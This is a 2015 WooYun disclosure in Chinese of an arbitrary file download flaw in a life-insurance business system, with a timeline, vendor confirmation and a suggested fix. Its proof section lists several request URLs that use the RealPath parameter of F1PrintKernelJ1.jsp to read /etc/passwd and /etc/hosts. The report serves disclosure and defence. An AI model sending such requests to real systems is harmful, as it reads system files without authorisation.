某寿险业务系统存在通用型任意文件下载漏洞

漏洞概要

缺陷编号:WooYun-2015-0127980

漏洞标题:某寿险业务系统存在通用型任意文件下载漏洞

相关厂商:中科软科技

漏洞作者:路人甲

提交时间:2015-07-23 11:53

公开时间:2015-10-22 16:14

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签:

漏洞详情

披露状态:

2015-07-23: 细节已通知厂商并且等待厂商处理中
2015-07-24: 厂商已经确认,细节仅向厂商公开
2015-07-27: 细节向第三方安全合作伙伴开放(绿盟科技、唐朝安全巡航、无声信息)
2015-09-17: 细节向核心白帽子及相关领域专家公开
2015-09-27: 细节向普通白帽子公开
2015-10-07: 细节向实习白帽子公开
2015-10-22: 细节向公众公开

简要描述:

任意文件下载

详细说明:

提供一些案例:

江泰人身保险业务系统**.**.**.**/f1print/F1PrintKernelJ1.jsp?&RealPath=/etc/hosts

**.**.**.**/f1print/F1PrintKernelJ1.jsp?&RealPath=/etc/passwd

漏洞证明:

http://**.**.**.**/f1print/F1PrintKernelJ1.jsp?&RealPath=/etc/passwd

**.**.**.**/ui/f1print/F1PrintKernelJ1.jsp?&RealPath=/etc/passwd

**.**.**.**/f1print/F1PrintKernelJ1.jsp?&RealPath=/etc/hosts

**.**.**.**/pre/f1print/F1PrintKernelJ1.jsp?&RealPath=/etc/hosts

http://**.**.**.**/ter/f1print/F1PrintKernelJ1.jsp?&RealPath=/etc/passwd

http://**.**.**.**/ui/f1print/F1PrintKernelJ1.jsp?&RealPath=/etc/passwd

修复方案:

控制访问权限,或者删除该下载页面

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-07-2416:13

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向保险行业信息化主管部门通报,由其后续协调网站管理单位处置.

最新状态:

暂无

评价